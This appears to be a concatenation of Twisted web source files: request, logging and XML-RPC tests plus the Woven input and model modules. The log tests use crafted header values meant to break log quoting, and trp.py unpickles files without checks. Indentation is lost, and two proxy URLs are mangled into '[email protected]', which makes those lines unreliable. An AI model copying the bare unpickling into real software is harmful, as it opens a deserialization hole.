request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com:81/foo/bar')
def testPrePathURLSSLPort(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
d.transport.port = 443
request = server.Request(d, 1)
request.setHost('example.com', 443)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'http://example.com:443/foo/bar')
def testPrePathURLSSLPortAndSSL(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 443
request = server.Request(d, 1)
request.setHost('example.com', 443)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com/foo/bar')
def testPrePathURLHTTPPortAndSSL(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 80
request = server.Request(d, 1)
request.setHost('example.com', 80)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com:80/foo/bar')
def testPrePathURLSSLNonDefault(self):
d = DummyChannel()
d.transport = DummyChannel.SSL()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://example.com:81/foo/bar')
def testPrePathURLSetSSLHost(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('foo.com', 81, 1)
request.gotLength(0)
request.requestReceived('GET', '/foo/bar', 'HTTP/1.0')
self.assertEqual(request.prePathURL(), 'https://foo.com:81/foo/bar')
def testNotifyFinishConnectionLost(self):
d = DummyChannel()
d.transport = DummyChannel.TCP()
request = server.Request(d, 1)
finished = request.notifyFinish()
request.connectionLost(error.ConnectionDone("Connection done"))
return self.assertFailure(finished, error.ConnectionDone)
class RootResource(resource.Resource):
isLeaf=0
def getChildWithDefault(self, name, request):
request.rememberRootURL()
return resource.Resource.getChildWithDefault(self, name, request)
def render(self, request):
return ''
class RememberURLTest(unittest.TestCase):
def createServer(self, r):
chan = DummyChannel()
chan.transport = DummyChannel.TCP()
chan.site = server.Site(r)
return chan
def testSimple(self):
r = resource.Resource()
r.isLeaf=0
rr = RootResource()
r.putChild('foo', rr)
rr.putChild('', rr)
rr.putChild('bar', resource.Resource())
chan = self.createServer(r)
for url in ['/foo/', '/foo/bar', '/foo/bar/baz', '/foo/bar/']:
request = server.Request(chan, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', url, 'HTTP/1.0')
self.assertEqual(request.getRootURL(), "http://example.com/foo")
def testRoot(self):
rr = RootResource()
rr.putChild('', rr)
rr.putChild('bar', resource.Resource())
chan = self.createServer(rr)
for url in ['/', '/bar', '/bar/baz', '/bar/']:
request = server.Request(chan, 1)
request.setHost('example.com', 81)
request.gotLength(0)
request.requestReceived('GET', url, 'HTTP/1.0')
self.assertEqual(request.getRootURL(), "http://example.com/")
class NewRenderResource(resource.Resource):
def render_GET(self, request):
return "hi hi"
def render_HEH(self, request):
return "ho ho"
class NewRenderTestCase(unittest.TestCase):
def _getReq(self):
d = DummyChannel()
d.site.resource.putChild('newrender', NewRenderResource())
d.transport = DummyChannel.TCP()
d.transport.port = 81
request = server.Request(d, 1)
request.setHost('example.com', 81)
request.gotLength(0)
return request
def testGoodMethods(self):
req = self._getReq()
req.requestReceived('GET', '/newrender', 'HTTP/1.0')
self.assertEquals(req.transport.getvalue().splitlines()[-1], 'hi hi')
req = self._getReq()
req.requestReceived('HEH', '/newrender', 'HTTP/1.0')
self.assertEquals(req.transport.getvalue().splitlines()[-1], 'ho ho')
def testBadMethods(self):
req = self._getReq()
req.requestReceived('CONNECT', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 501)
req = self._getReq()
req.requestReceived('hlalauguG', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 501)
def testImplicitHead(self):
req = self._getReq()
req.requestReceived('HEAD', '/newrender', 'HTTP/1.0')
self.assertEquals(req.code, 200)
self.assertEquals(-1, req.transport.getvalue().find('hi hi'))
class SDResource(resource.Resource):
def __init__(self,default): self.default=default
def getChildWithDefault(self,name,request):
d=defer.succeed(self.default)
return util.DeferredResource(d).getChildWithDefault(name, request)
class SDTest(unittest.TestCase):
def testDeferredResource(self):
r = resource.Resource()
r.isLeaf = 1
s = SDResource(r)
d = DummyRequest(['foo', 'bar', 'baz'])
resource.getChildForRequest(s, d)
self.assertEqual(d.postpath, ['bar', 'baz'])
class DummyRequestForLogTest(DummyRequest):
uri='/dummy' # parent class uri has "http://", which doesn't really happen
code = 123
client = '1.2.3.4'
clientproto = 'HTTP/1.0'
sentLength = None
def __init__(self, *a, **kw):
DummyRequest.__init__(self, *a, **kw)
self.headers = {}
def getHeader(self, h):
return self.headers.get(h.lower(), None)
def getClientIP(self):
return self.client
class TestLogEscaping(unittest.TestCase):
def setUp(self):
self.site = http.HTTPFactory()
self.site.logFile = StringIO()
self.request = DummyRequestForLogTest(self.site, False)
def testSimple(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "-"\n')
def testMethodQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.method = 'G"T'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "G\\"T /dummy HTTP/1.0" 123 - "-" "-"\n')
def testRequestQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.uri='/dummy"withquote'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy\\"withquote HTTP/1.0" 123 - "-" "-"\n')
def testProtoQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.clientproto='HT"P/1.0'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HT\\"P/1.0" 123 - "-" "-"\n')
def testRefererQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.headers['referer'] = 'http://malicious" ".website.invalid'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "http://malicious\\" \\".website.invalid" "-"\n')
def testUserAgentQuote(self):
http._logDateTime = "[%02d/%3s/%4d:%02d:%02d:%02d +0000]" % (
25, 'Oct', 2004, 12, 31, 59)
self.request.headers['user-agent'] = 'Malicious Web" Evil'
self.site.log(self.request)
self.site.logFile.seek(0)
self.assertEqual(
self.site.logFile.read(),
'1.2.3.4 - - [25/Oct/2004:12:31:59 +0000] "GET /dummy HTTP/1.0" 123 - "-" "Malicious Web\\" Evil"\n')
```
#### File: web/test/test_xmlrpc.py
```python
try:
import xmlrpclib
except ImportError:
xmlrpclib = None
class XMLRPC: pass
else:
from twisted.web import xmlrpc
from twisted.web.xmlrpc import XMLRPC, addIntrospection
from twisted.trial import unittest
from twisted.web import server, static
from twisted.internet import reactor, defer
from twisted.python import log
import time
class TestRuntimeError(RuntimeError):
pass
class TestValueError(ValueError):
pass
class Test(XMLRPC):
FAILURE = 666
NOT_FOUND = 23
SESSION_EXPIRED = 42
# the doc string is part of the test
def xmlrpc_add(self, a, b):
"""This function add two numbers."""
return a + b
xmlrpc_add.signature = [['int', 'int', 'int'],
['double', 'double', 'double']]
# the doc string is part of the test
def xmlrpc_pair(self, string, num):
"""This function puts the two arguments in an array."""
return [string, num]
xmlrpc_pair.signature = [['array', 'string', 'int']]
# the doc string is part of the test
def xmlrpc_defer(self, x):
"""Help for defer."""
return defer.succeed(x)
def xmlrpc_deferFail(self):
return defer.fail(TestValueError())
# don't add a doc string, it's part of the test
def xmlrpc_fail(self):
raise TestRuntimeError
def xmlrpc_fault(self):
return xmlrpc.Fault(12, "hello")
def xmlrpc_deferFault(self):
return defer.fail(xmlrpc.Fault(17, "hi"))
def xmlrpc_complex(self):
return {"a": ["b", "c", 12, []], "D": "foo"}
def xmlrpc_dict(self, map, key):
return map[key]
def _getFunction(self, functionPath):
try:
return XMLRPC._getFunction(self, functionPath)
except xmlrpc.NoSuchFunction:
if functionPath.startswith("SESSION"):
raise xmlrpc.Fault(self.SESSION_EXPIRED, "Session non-existant/expired.")
else:
raise
xmlrpc_dict.help = 'Help for dict.'
class TestAuthHeader(Test):
"""
This is used to get the header info so that we can test
authentication.
"""
def __init__(self):
Test.__init__(self)
self.request = None
def render(self, request):
self.request = request
return Test.render(self, request)
def xmlrpc_authinfo(self):
return self.request.getUser(), self.request.getPassword()
class XMLRPCTestCase(unittest.TestCase):
def setUp(self):
self.p = reactor.listenTCP(0, server.Site(Test()),
interface="127.0.0.1")
self.port = self.p.getHost().port
def tearDown(self):
return self.p.stopListening()
def proxy(self):
return xmlrpc.Proxy("http://127.0.0.1:%d/" % self.port)
def testResults(self):
inputOutput = [
("add", (2, 3), 5),
("defer", ("a",), "a"),
("dict", ({"a": 1}, "a"), 1),
("pair", ("a", 1), ["a", 1]),
("complex", (), {"a": ["b", "c", 12, []], "D": "foo"})]
dl = []
for meth, args, outp in inputOutput:
d = self.proxy().callRemote(meth, *args)
d.addCallback(self.assertEquals, outp)
dl.append(d)
return defer.DeferredList(dl, fireOnOneErrback=True)
def testErrors(self):
dl = []
for code, methodName in [(666, "fail"), (666, "deferFail"),
(12, "fault"), (23, "noSuchMethod"),
(17, "deferFault"), (42, "SESSION_TEST")]:
d = self.proxy().callRemote(methodName)
d = self.assertFailure(d, xmlrpc.Fault)
d.addCallback(lambda exc, code=code: self.assertEquals(exc.faultCode, code))
dl.append(d)
d = defer.DeferredList(dl, fireOnOneErrback=True)
d.addCallback(lambda ign: log.flushErrors(TestRuntimeError, TestValueError))
return d
class XMLRPCTestCase2(XMLRPCTestCase):
"""Test with proxy that doesn't add a slash."""
def proxy(self):
return xmlrpc.Proxy("http://127.0.0.1:%d" % self.port)
class XMLRPCAllowNoneTestCase(unittest.TestCase):
"""
Test with allowNone set to True.
These are not meant to be exhaustive serialization tests, since
L{xmlrpclib} does all of the actual serialization work. They are just
meant to exercise a few codepaths to make sure we are calling into
xmlrpclib correctly.
"""
def setUp(self):
self.p = reactor.listenTCP(
0, server.Site(Test(allowNone=True)), interface="127.0.0.1")
self.port = self.p.getHost().port
def tearDown(self):
return self.p.stopListening()
def proxy(self):
return xmlrpc.Proxy("http://127.0.0.1:%d" % (self.port,), allowNone=True)
def test_deferredNone(self):
"""
Test that passing a C{None} as an argument to a remote method and
returning a L{Deferred} which fires with C{None} properly passes
</nil> over the network if allowNone is set to True.
"""
d = self.proxy().callRemote('defer', None)
d.addCallback(self.assertEquals, None)
return d
def test_dictWithNoneValue(self):
"""
Test that return a C{dict} with C{None} as a value works properly.
"""
d = self.proxy().callRemote('defer', {'a': None})
d.addCallback(self.assertEquals, {'a': None})
return d
class XMLRPCTestAuthenticated(XMLRPCTestCase):
"""
Test with authenticated proxy. We run this with the same inout/ouput as
above.
"""
user = "username"
password = "<PASSWORD>"
def setUp(self):
self.p = reactor.listenTCP(0, server.Site(TestAuthHeader()),
interface="127.0.0.1")
self.port = self.p.getHost().port
def testAuthInfoInURL(self):
p = xmlrpc.Proxy("http://%s:%[email protected]:%d/" % (self.user, self.password, self.port))
return p.callRemote("authinfo").addCallback(self.assertEquals, [self.user, self.password])
def testExplicitAuthInfo(self):
p = xmlrpc.Proxy("http://127.0.0.1:%d/" % (self.port,), self.user, self.password)
return p.callRemote("authinfo").addCallback(self.assertEquals, [self.user, self.password])
def testExplicitAuthInfoOverride(self):
p = xmlrpc.Proxy("http://wrong:[email protected]:%d/" % (self.port,), self.user, self.password)
return p.callRemote("authinfo").addCallback(self.assertEquals, [self.user, self.password])
class XMLRPCTestIntrospection(XMLRPCTestCase):
def setUp(self):
xmlrpc = Test()
addIntrospection(xmlrpc)
self.p = reactor.listenTCP(0, server.Site(xmlrpc),interface="127.0.0.1")
self.port = self.p.getHost().port
def testListMethods(self):
def cbMethods(meths):
meths.sort()
self.failUnlessEqual(
meths,
['add', 'complex', 'defer', 'deferFail',
'deferFault', 'dict', 'fail', 'fault',
'pair', 'system.listMethods',
'system.methodHelp',
'system.methodSignature'])
d = self.proxy().callRemote("system.listMethods")
d.addCallback(cbMethods)
return d
def testMethodHelp(self):
inputOutputs = [
("defer", "Help for defer."),
("fail", ""),
("dict", "Help for dict.")]
dl = []
for meth, expected in inputOutputs:
d = self.proxy().callRemote("system.methodHelp", meth)
d.addCallback(self.assertEquals, expected)
dl.append(d)
return defer.DeferredList(dl, fireOnOneErrback=True)
def testMethodSignature(self):
inputOutputs = [
("defer", ""),
("add", [['int', 'int', 'int'],
['double', 'double', 'double']]),
("pair", [['array', 'string', 'int']])]
dl = []
for meth, expected in inputOutputs:
d = self.proxy().callRemote("system.methodSignature", meth)
d.addCallback(self.assertEquals, expected)
dl.append(d)
return defer.DeferredList(dl, fireOnOneErrback=True)
class XMLRPCClientErrorHandling(unittest.TestCase):
def setUp(self):
self.resource = static.File(__file__)
self.resource.isLeaf = True
self.port = reactor.listenTCP(0, server.Site(self.resource), interface='127.0.0.1')
def tearDown(self):
return self.port.stopListening()
def testErroneousResponse(self):
proxy = xmlrpc.Proxy("http://127.0.0.1:%d/" % (self.port.getHost().port,))
return self.assertFailure(proxy.callRemote("someMethod"), Exception)
```
#### File: twisted/web/trp.py
```python
from pickle import Unpickler
def ResourceUnpickler(path, registry = None):
fl = open(path)
result = Unpickler(fl).load()
return result
```
#### File: web/woven/input.py
```python
import os
import inspect
from twisted.internet import defer
from twisted.python import log
from twisted.python.reflect import qual
from twisted.web import domhelpers
from twisted.web.woven import template, controller, utils
__version__ = "$Revision: 1.34 $"[11:-2]
controllerFactory = controller.controllerFactory
class InputHandler(controller.Controller):
"""
An InputHandler is like a controller, but it operates on something
contained inside of C{self.model} instead of directly on C{self.model}.
For example, a Handler whose C{model} has been set to C{"foo"} will handle
C{self.model.foo}.
The handler's job is to interpret the request and:
1. Check for valid input
2. If the input is valid, update the model
3. Use any special API of the view widget to change the view (other
than what the view updates automatically from the model) e.g. in the
case of an error, tell the view to report an error to the user
4. Return a success value; by default these values are simply recorded
and the page is rendered, but these values could be used to determine
what page to display next, etc.
"""
invalidErrorText = "Error!"
setupStacks = 0
def __init__(self, model=None,
parent=None,
name=None,
check=None,
commit = None,
invalidErrorText = None,
submodel=None,
controllerStack=None):
self.controllerStack = controllerStack
controller.Controller.__init__(self, model)
self._check = check
self._commit = commit
self._errback = None
self._parent = parent
if invalidErrorText is not None:
self.invalidErrorText = invalidErrorText
if submodel is not None:
self.submodel = submodel
if name is not None:
self.inputName = name
def initialize(self):
pass
def setNode(self, node):
self.node = node
def getInput(self, request):
"""
Return the data associated with this handler from the request, if any.
"""
name = getattr(self, 'inputName', self.submodel)
input = request.args.get(name, None)
if input:
return input
def handle(self, request):
self.initialize()
data = self.getInput(request)
success = self.check(request, data)
if isinstance(success, defer.Deferred):
success.addCallback(self.dispatchCheckResult, request, data)
success.addErrback(utils.renderFailure, request)
return success
self.dispatchCheckResult(success, request, data)
def dispatchCheckResult(self, success, request, data):
if success is not None:
if success:
result = self.handleValid(request, data)
else:
result = self.handleInvalid(request, data)
if isinstance(result, defer.Deferred):
return result
def check(self, request, data):
"""
Check whether the input in the request is valid for this handler
and return a boolean indicating validity.
"""
if self._check is None:
raise NotImplementedError(qual(self.__class__)+'.check')
# self._check is probably a bound method or simple function that
# doesn't have a reference to this InputHandler; pass it
return self._check(self, request, data)
def handleValid(self, request, data):
"""
It has been determined that the input for this handler is valid;
however, that does not mean the entire form is valid.
"""
self._parent.aggregateValid(request, self, data)
def aggregateValid(self, request, inputhandler, data):
"""By default we just pass the method calls all the way up to the root
Controller. However, an intelligent InputHandler could override this
and implement a state machine that waits for all data to be collected
and then fires.
"""
self._parent.aggregateValid(request, inputhandler, data)
def handleInvalid(self, request, data):
"""
Once it has been determined that the input is invalid, we should
tell our view to report this fact to the user.
"""
self._parent.aggregateInvalid(request, self, data)
self.view.setError(request, self.invalidErrorText)
def aggregateInvalid(self, request, inputhandler, data):
"""By default we just pass this method call all the way up to the root
Controller.
"""
self._parent.aggregateInvalid(request, inputhandler, data)
def commit(self, request, node, data):
"""
It has been determined that the input for the entire form is completely
valid; it is now safe for all handlers to commit changes to the model.
"""
if self._commit is None:
data = str(data)
if data != self.view.getData():
self.model.setData(data)
self.model.notify({'request': request, self.submodel: data})
else:
func = self._commit
if hasattr(func, 'im_func'):
func = func.im_func
args, varargs, varkw, defaults = inspect.getargspec(func)
if args[1] == 'request':
self._commit(request, data)
else:
self._commit(data)
class DefaultHandler(InputHandler):
def handle(self, request):
"""
By default, we don't do anything
"""
pass
class SingleValue(InputHandler):
def getInput(self, request):
name = getattr(self, 'inputName', self.submodel)
input = request.args.get(name, None)
if input:
return input[0]
class Anything(SingleValue):
"""
Handle anything except for None
"""
def check(self, request, data):
if data is not None:
return 1
return None
class Integer(SingleValue):
"""
Only allow a single integer
"""
def check(self, request, data):
if data is None: return None
try:
int(data)
return 1
except (TypeError, ValueError):
return 0
def handleInvalid(self, request, data):
self.invalidErrorText = "%s is not an integer. Please enter an integer." % data
SingleValue.handleInvalid(self, request, data)
class Float(SingleValue):
"""
Only allow a single float
"""
def check(self, request, data):
if data is None: return None
try:
float(data)
return 1
except (TypeError, ValueError):
return 0
def handleInvalid(self, request, data):
self.invalidErrorText = "%s is not an float. Please enter a float." % data
SingleValue.handleInvalid(self, request, data)
class List(InputHandler):
def check(self, request, data):
return None
class DictAggregator(Anything):
"""An InputHandler for a <form> tag, for triggering a function
when all of the form's individual inputs have been validated.
Also for use gathering a dict of arguments to pass to a parent's
aggregateValid if no commit function is passed.
Usage example::
<form controller="theForm" action="">
<input controller="Integer"
view="InputText" model="anInteger" />
<input controller="Anything"
view="InputText" model="aString" />
<input type="submit" />
</form>
def theCommitFunction(anInteger=None, aString=None):
'''Note how the keyword arguments match up with the leaf model
names above
'''
print "Yay", anInteger, aString
class CMyController(controller.Controller):
def wcfactory_theForm(self, request, node, m):
return input.FormAggregator(m, commit=theCommitFunction)
"""
def aggregateValid(self, request, inputhandler, data):
"""Aggregate valid input from inputhandlers below us, into a dictionary.
"""
self._valid[inputhandler] = data
def aggregateInvalid(self, request, inputhandler, data):
self._invalid[inputhandler] = data
def exit(self, request):
"""This is the node complete message
"""
if self._commit:
# Introspect the commit function to see what
# keyword arguments it takes
func = self._commit
if hasattr(func, 'im_func'):
func = func.im_func
args, varargs, varkw, defaults = inspect.getargspec(
func)
wantsRequest = len(args) > 1 and args[1] == 'request'
if self._invalid:
# whoops error!!!1
if self._errback:
self._errback(request, self._invalid)
elif self._valid:
# We've got all the input
# Gather it into a dict and call the commit function
results = {}
for item in self._valid:
results[item.model.name] = self._valid[item]
if self._commit:
if wantsRequest:
self._commit(request, **results)
else:
self._commit(**results)
else:
self._parent.aggregateValid(request, self, results)
return results
class ListAggregator(Anything):
def aggregateValid(self, request, inputhandler, data):
"""Aggregate valid input from inputhandlers below us into a
list until we have all input from controllers below us to pass
to the commit function that was passed to the constructor or
our parent's aggregateValid.
"""
if not hasattr(self, '_validList'):
self._validList = []
self._validList.append(data)
def aggregateInvalid(self, request, inputhandler, data):
if not hasattr(self, '_invalidList'):
self._invalidList = []
self._invalidList.append(data)
def exit(self, request):
if self._commit:
# Introspect the commit function to see what
#arguments it takes
func = self._commit
if hasattr(func, 'im_func'):
func = func.im_func
args, varargs, varkw, defaults = inspect.getargspec(func)
self.numArgs = len(args)
wantsRequest = args[1] == 'request'
if wantsRequest:
numArgs -= 1
else:
# Introspect the template to see if we still have
# controllers that will be giving us input
# aggregateValid is called before the view renders the node, so
# we can count the number of controllers below us the first time
# we are called
if not hasattr(self, 'numArgs'):
self.numArgs = len(domhelpers.findElementsWithAttributeShallow(
self.view.node, "controller"))
if self._invalidList:
self._parent.aggregateInvalid(request, self, self._invalidList)
else:
if self._commit:
if wantsRequest:
self._commit(request, *self._validList)
else:
self._commit(*self._validList)
self._parent.aggregateValid(request, self, self._invalidList)
def commit(self, request, node, data):
"""If we're using the ListAggregator, we don't want the list of items
to be rerendered
xxx Need to have a "node complete" message sent to the controller
so we can reset state, so controllers can be re-run or ignore input the second time
"""
pass
```
#### File: web/woven/model.py
```python
__version__ = "$Revision: 1.53 $"[11:-2]
import types
import weakref
import warnings
from zope.interface import implements
from twisted.python import components, reflect
from twisted.internet import defer
from twisted.web.woven import interfaces
class _Nothing: pass
def adaptToIModel(m, parent=None, submodel=None):
adapted = interfaces.IModel(m, None)
if adapted is None:
adapted = Wrapper(m)
adapted.parent = parent
adapted.name = submodel
return adapted
class Model:
"""
A Model which keeps track of views which are looking at it in order
to notify them when the model changes.
"""
implements(interfaces.IModel)
def __init__(self, *args, **kwargs):
if len(args):
self.original = args[0]
else:
self.original = self
self.name = ''
self.parent = None
self.views = []
self.subviews = {}
self.submodels = {}
self._getter = kwargs.get('getter')
self._setter = kwargs.get('setter')
self.cachedFor = None
self.initialize(*args, **kwargs)
def __getstate__(self):
self.views = []
self.subviews = {}
self.submodels = {}
return self.__dict__
def invalidateCache(self):
"""Invalidate the cache for this object, so the next time
getData is called, it's getter method is called again.
"""
self.cachedFor = None
def initialize(self, *args, **kwargs):
"""
Hook for subclasses to initialize themselves without having to
mess with the __init__ chain.
"""
pass
def addView(self, view):
"""
Add a view for the model to keep track of.
"""
if view not in [ref() for ref in self.views]:
self.views.append(weakref.ref(view))
def addSubview(self, name, subview):
subviewList = self.subviews.get(name, [])
subviewList.append(weakref.ref(subview))
self.subviews[name] = subviewList
def removeView(self, view):
"""
Remove a view that the model no longer should keep track of.
"""
# AM: loop on a _copy_ of the list, since we're changing it!!!
for weakref in list(self.views):
ref = weakref()
if ref is view or ref is None:
self.views.remove(weakref)
def setGetter(self, getter):
self._getter = getter
def setSetter(self, setter):
self._setter = setter
def notify(self, changed=None):
"""
Notify all views that something was changed on me.
Passing a dictionary of {'attribute': 'new value'} in changed
will pass this dictionary to the view for increased performance.
If you don't want to do this, don't, and just use the traditional
MVC paradigm of querying the model for things you're interested
in.
"""
self.cachedFor = None
if changed is None: changed = {}
retVal = []
# AM: loop on a _copy_ of the list, since we're changing it!!!
for view in list(self.views):
ref = view()
if ref is not None:
retVal.append((ref, ref.modelChanged(changed)))
else:
self.views.remove(view)
for key, value in self.subviews.items():
if value.wantsAllNotifications or changed.has_key(key):
for item in list(value):
ref = item()
if ref is not None:
retVal.append((ref, ref.modelChanged(changed)))
else:
value.remove(item)
return retVal
protected_names = ['initialize', 'addView', 'addSubview', 'removeView', 'notify', 'getSubmodel', 'setSubmodel', 'getData', 'setData']
allowed_names = []
def lookupSubmodel(self, request, submodelName):
"""
Look up a full submodel name. I will split on `/' and call
L{getSubmodel} on each element in the 'path'.
Override me if you don't want 'traversing'-style lookup, but
would rather like to look up a model based on the entire model
name specified.
If you override me to return Deferreds, make sure I look up
values in a cache (created by L{setSubmodel}) before doing a
regular Deferred lookup.
XXX: Move bits of this docstring to interfaces.py
"""
if not submodelName:
return None
# Special case: If the first character is /
# Start at the bottom of the model stack
currentModel = self
if submodelName[0] == '/':
while currentModel.parent is not None:
currentModel = currentModel.parent
submodelName = submodelName[1:]
submodelList = submodelName.split('/') #[:-1]
# print "submodelList", submodelList
for element in submodelList:
if element == '.' or element == '':
continue
elif element == '..':
currentModel = currentModel.parent
else:
currentModel = currentModel.getSubmodel(request, element)
if currentModel is None:
return None
return currentModel
def submodelCheck(self, request, name):
"""Check if a submodel name is allowed. Subclass me to implement a
name security policy.
"""
if self.allowed_names:
return (name in self.allowed_names)
else:
return (name and name[0] != '_' and name not in self.protected_names)
def submodelFactory(self, request, name):
warnings.warn("Warning: default Model lookup strategy is changing:"
"use either AttributeModel or MethodModel for now.",
DeprecationWarning)
if hasattr(self, name):
return getattr(self, name)
else:
return None
def getSubmodel(self, request, name):
"""
Get the submodel `name' of this model. If I ever return a
Deferred, then I ought to check for cached values (created by
L{setSubmodel}) before doing a regular Deferred lookup.
"""
if self.submodels.has_key(name):
return self.submodels[name]
if not self.submodelCheck(request, name):
return None
m = self.submodelFactory(request, name)
if m is None:
return None
sm = adaptToIModel(m, self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
"""
Set a submodel on this model. If getSubmodel or lookupSubmodel
ever return a Deferred, I ought to set this in a place that
lookupSubmodel/getSubmodel know about, so they can use it as a
cache.
"""
if self.submodelCheck(request, name):
if self.submodels.has_key(name):
del self.submodels[name]
setattr(self, name, value)
def dataWillChange(self):
pass
def getData(self, request):
if self.cachedFor != id(request) and self._getter is not None:
self.cachedFor = id(request)
self.dataWillChange()
self.orig = self.original = self._getter(request)
return self.original
def setData(self, request, data):
if self._setter is not None:
self.cachedFor = None
return self._setter(request, data)
else:
if hasattr(self, 'parent') and self.parent:
self.parent.setSubmodel(request, self.name, data)
self.orig = self.original = data
class MethodModel(Model):
"""Look up submodels with wmfactory_* methods.
"""
def submodelCheck(self, request, name):
"""Allow any submodel for which I have a submodel.
"""
return hasattr(self, "wmfactory_"+name)
def submodelFactory(self, request, name):
"""Call a wmfactory_name method on this model.
"""
meth = getattr(self, "wmfactory_"+name)
return meth(request)
def getSubmodel(self, request=None, name=None):
if name is None:
warnings.warn("Warning! getSubmodel should now take the request as the first argument")
name = request
request = None
cached = self.submodels.has_key(name)
sm = Model.getSubmodel(self, request, name)
if sm is not None:
if not cached:
sm.cachedFor = id(request)
sm._getter = getattr(self, "wmfactory_"+name)
return sm
class AttributeModel(Model):
"""Look up submodels as attributes with hosts.allow/deny-style security.
"""
def submodelFactory(self, request, name):
if hasattr(self, name):
return getattr(self, name)
else:
return None
#backwards compatibility
WModel = Model
class Wrapper(Model):
"""
I'm a generic wrapper to provide limited interaction with the
Woven models and submodels.
"""
parent = None
name = None
def __init__(self, orig):
Model.__init__(self)
self.orig = self.original = orig
def dataWillChange(self):
pass
def __repr__(self):
myLongName = reflect.qual(self.__class__)
return "<%s instance at 0x%x: wrapped data: %s>" % (myLongName,
id(self), self.original)
class ListModel(Wrapper):
"""
I wrap a Python list and allow it to interact with the Woven
models and submodels.
"""
def dataWillChange(self):
self.submodels = {}
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("Warning!")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
orig = self.original
try:
i = int(name)
except:
return None
if i > len(orig):
return None
sm = adaptToIModel(orig[i], self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
if value is None:
warnings.warn("Warning!")
value = name
name = request
request = None
self.original[int(name)] = value
def __len__(self):
return len(self.original)
def __getitem__(self, name):
return self.getSubmodel(None, str(name))
def __setitem__(self, name, value):
self.setSubmodel(None, str(name), value)
def __repr__(self):
myLongName = reflect.qual(self.__class__)
return "<%s instance at 0x%x: wrapped data: %s>" % (myLongName,
id(self), self.original)
class StringModel(ListModel):
""" I wrap a Python string and allow it to interact with the Woven models
and submodels. """
def setSubmodel(self, request=None, name=None, value=None):
raise ValueError("Strings are immutable.")
# pyPgSQL returns "PgResultSet" instances instead of lists, which look, act
# and breathe just like lists. pyPgSQL really shouldn't do this, but this works
try:
from pyPgSQL import PgSQL
components.registerAdapter(ListModel, PgSQL.PgResultSet, interfaces.IModel)
except:
pass
class DictionaryModel(Wrapper):
"""
I wrap a Python dictionary and allow it to interact with the Woven
models and submodels.
"""
def dataWillChange(self):
self.submodels = {}
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("getSubmodel must get a request argument now")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
orig = self.original
if name not in orig:
return None
sm = adaptToIModel(orig[name], self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
if value is None:
warnings.warn("Warning!")
value = name
name = request
request = None
self.original[name] = value
class AttributeWrapper(Wrapper):
"""
I wrap an attribute named "name" of the given parent object.
"""
def __init__(self, parent, name):
self.original = None
parent = ObjectWrapper(parent)
Wrapper.__init__(self, parent.getSubmodel(None, name))
self.parent = parent
self.name = name
class ObjectWrapper(Wrapper):
"""
I may wrap an object and allow it to interact with the Woven models
and submodels. By default, I am not registered for use with anything.
"""
def getSubmodel(self, request=None, name=None):
if name is None and type(request) is type(""):
warnings.warn("Warning!")
name = request
request = None
if self.submodels.has_key(name):
return self.submodels[name]
sm = adaptToIModel(getattr(self.original, name), self, name)
self.submodels[name] = sm
return sm
def setSubmodel(self, request=None, name=None, value=None):
if value is None:
warnings.warn("Warning!")
value = name
name = request
request = None
setattr(self.original, name, value)
class UnsafeObjectWrapper(ObjectWrapper):
"""
I may wrap an object and allow it to interact with the Woven models
and submodels. By default, I am not registered for use with anything.
I am unsafe because I allow methods to be called. In fact, I am
dangerously unsafe. Be wary or I will kill your security model!
"""
